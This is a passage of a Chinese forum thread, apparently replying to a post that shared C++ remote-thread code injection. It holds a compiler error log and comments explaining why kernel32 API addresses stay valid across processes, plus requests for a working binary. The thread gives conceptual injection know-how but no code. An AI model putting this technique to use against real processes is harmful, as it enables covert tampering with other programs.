C:\test\test1\test1.cpp(92) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(93) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(99) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(133) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(143) : error C2197: 'int (__stdcall *)(void)' : too many actual parameters
C:\test\test1\test1.cpp(217) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(218) : error C2664: 'FreeLibrary' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(221) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(222) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(223) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(224) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(225) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(226) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(227) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(228) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(229) : error C2664: 'GetProcAddress' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(230) : error C2664: 'FreeLibrary' : cannot convert parameter 1 from 'void *' to 'struct HINSTANCE__ *'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
C:\test\test1\test1.cpp(279) : error C2664: 'CreateRemoteThread' : cannot convert parameter 4 from 'void *' to 'unsigned long (__stdcall *)(void *)'
        Conversion from 'void*' to pointer to non-'void' requires an explicit cast
Error executing cl.exe.

test1.exe - 31 error(s), 0 warning(s)
darkbot 2008-11-10 18:13
学习了...
zcUDer 2008-11-11 11:50
看了楼主的代码,心中有点疑惑,
楼主先在InitializeStruct中loadlibrary了kernel32.dll,然后再调用createmotethread并把api的地址作为参数传进去,感觉有些不解。
获取的api地址是本进程的api地址,并不是目标进程的api地址,而注入到目标进城以后可能因为dll重定位导致函数地址不正确,
我的想法是在线程函数中调用GetProcAddress,获取api地址,
请诸位大大姐大小弟心中的疑惑
abcdnswjl 2008-11-11 16:58
为什么大虾们都不帮我们解决一下问题啊,都知道怎么做,就是不肯回答一下(18楼)
hyoyy 2008-11-12 12:38
看不懂呀..
trkzrq 2008-11-13 10:46
这里取到的是 kernel32/ntdll 导出函数在本进程里的虚拟地址。由于系统 DLL 在每个进程中映射到同一基址，这些地址对同一次开机内的所有进程都是一样的（XP 没有 ASLR；Vista 以后的 ASLR 也只是每次开机随机一次），所以可以直接传给目标进程用；但重启后会变，不能写死在代码里，必须像本文这样运行时取。
五德转移 2008-11-15 18:56
vs2008编译通过,不能运行,release编译36个错误。
gongbin 2008-11-16 13:01
功力不深厚  看不懂呀...继续学习中..
komawang 2009-6-5 17:07
谁有编译通过的一份发给我下,谢谢!

koma0769@vip.qq.com
努力成长 2009-6-30 17:07
支持楼上的观点。
鹿剑 3 2009-6-30 18:27
好文章,学习了
fanndy 2009-6-30 18:28
2008  能运行  不过好像没效果 再看看
pubhobo 2009-6-30 19:08
感谢分享代码了
jesterjy 1 2009-7-1 01:19
kernel32.dll 在同一次开机内的每个进程里基址相同（XP 没有 ASLR，Vista 以后也只是每次启动时随机一次），所以在本进程中得到的 LoadLibrary、GetProcAddress 等函数地址在目标进程里同样有效；但这些地址重启后会变化，必须在运行时获取，不能硬编码。
徐大力 8 2009-7-1 21:54
都这么长时间了。。。。。没人编译成功?

传份BIN 好了  省得有人怀疑   最好用原版的XP实验
现在很多修改版XP  都对任务管理器 加壳了  所以 不一定有用
今天 宽带欠费   拔网线  开无线网卡 居然能上。。。。。
上传的附件: